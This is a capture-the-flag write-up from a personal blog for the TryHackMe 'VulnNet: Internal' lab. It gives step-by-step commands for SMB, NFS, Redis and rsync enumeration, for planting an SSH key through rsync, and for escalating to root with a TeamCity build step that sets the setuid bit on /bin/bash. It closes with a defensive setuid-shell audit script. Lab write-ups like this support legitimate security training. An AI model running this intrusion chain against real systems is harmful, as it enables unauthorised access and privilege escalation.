_  _              _
     ___  __| || |__  _ _  ___| |__
    / -_)/ _` || '_ \| '_|(_-<| / /
    \___|\__,_||_.__/|_|  /__/|_\_\
                    u/edbrsk's blog

TryHackMe Vulnet: Internal - Writeup

This is an easy/medium difficulty TryHackMe machine.

Challenge brief

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.

There are four flags that need to be submitted in order to complete the challenge:

- Service Flag
- Internal Flag
- User Flag
- Root Flag


Nmap Scan

nmap -p- -sS -T5 --min-rate 1000 --max-retries=3 --open -vvv -n -Pn -oG allPorts

nmap -sC -sV -p22,111,139,445,873,2049,6379,40031,40423,44823,53943 -oN targeted

Port 139 & 445 - SMB

Let’s enumerate with enum4linux:

enum4linux -a

|    Share Enumeration on   |
        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        shares          Disk      VulnNet Business Shares
        IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on
//$   Mapping: DENIED, Listing: N/A
//   Mapping: OK, Listing: OK
//$     [E] Can not understand response:

| Users on via RID cycling (RIDS: 500-550,1000-1050) |

[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1569020563-4280465252-527208056
[I] Found new SID: S-1-5-32

[+] Enumerating users using SID S-1-5-21-1569020563-4280465252-527208056 and logon username '', password ''
S-1-5-21-1569020563-4280465252-527208056-513 VULNNET-INTERNAL\None (Domain Group)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
 S-1-22-1-1000 Unix User\sys-internal (Local User)

Let’s access // with smbclient using a null session.

Inside /tmp we will get the services.txt flag

$ cat services.txt 

Port 2049 - nfs_acl

Port 2049 is open, and I noticed that there was a lot of output for port 111. In that output I can see that the NFS service is present. This indicates that I might be able to list and download (and maybe upload) files.

More about NFS:

mkdir /tmp/infosec
mount -t nfs /tmp/infosec

Port 6379 - Redis

Port 6379 is open, and the `requirepass` directive we found now gives us the Redis password:

requirepass "B65Hx562...."

More about Redis:

redis-cli -h

AUTH B65Hx562....


keys *

GET "internal flag"

LRANGE "authlist" 0 100

Port 873 - Rsync

In the “authlist” key we found a base64-encoded value which, when decoded, gives us the credentials for the rsync service.

More about Rsync:

nc -vn 873

@RSYNCD: 31.0

rsync rsync://rsync-connect@

rsync rsync://rsync-connect@

rsync rsync://rsync-connect@ .


Let’s get a shell

ssh-keygen -o

rsync -av id_rsa.pub rsync://rsync-connect@

ssh -i id_rsa sys-internal@

I now have SSH access to the target machine.

Root Privilege Escalation - TeamCity

More about TeamCity:

ssh -L 8111: -i id_rsa sys-internal@

Taking a look around the server, inside /TeamCity/logs there is a file called catalina.out, where we can find the token to log in as super admin.


- Create a project
- Create a build configuration
- Search for build steps
    - New build step (command line)
    - script: `chmod +s /bin/bash`
- Run!
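As an added defender-side check (my own example, not part of the original writeup): the last step leaves a setuid /bin/bash behind, which is exactly the artifact a host audit should flag. The script below lists setuid/setgid binaries that are interactive shells or are absent from a baseline allowlist; the BASELINE set is an assumed, illustrative list, not taken from the box.

```python
import os
import stat

# Constructed allowlist of setuid/setgid binaries one expects on a stock Ubuntu
# image; regenerate it from a known-good host rather than trusting this list.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec",
}
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "fish"}

SHELL_REASON = "setuid/setgid bit on an interactive shell"
UNKNOWN_REASON = "setuid/setgid binary not in baseline"


def classify(entries, baseline=BASELINE):
    """entries: iterable of (path, st_mode) pairs, e.g. from os.lstat().
    Returns [(path, reason)] for every regular file carrying the setuid or
    setgid bit that is either a shell or absent from the baseline."""
    findings = []
    for path, mode in entries:
        if not stat.S_ISREG(mode) or not mode & (stat.S_ISUID | stat.S_ISGID):
            continue
        if os.path.basename(path) in SHELLS:
            findings.append((path, SHELL_REASON))
        elif path not in baseline:
            findings.append((path, UNKNOWN_REASON))
    return findings


def scan(roots=("/usr/bin", "/usr/sbin", "/bin", "/sbin", "/usr/local/bin")):
    """Walk the given roots and classify what is actually on disk.
    Symlinks are resolved so /bin/bash and /usr/bin/bash count once."""
    seen = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                real = os.path.realpath(os.path.join(dirpath, name))
                try:
                    seen[real] = os.lstat(real).st_mode
                except OSError:
                    continue
    return classify(sorted(seen.items()))


if __name__ == "__main__":
    for path, reason in scan():
        print(f"{path}: {reason}")
```

Run it as root from a cron job or a configuration-management hook and diff the output against the previous run; a new entry for a shell is the `chmod +s /bin/bash` artifact from the build step above.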
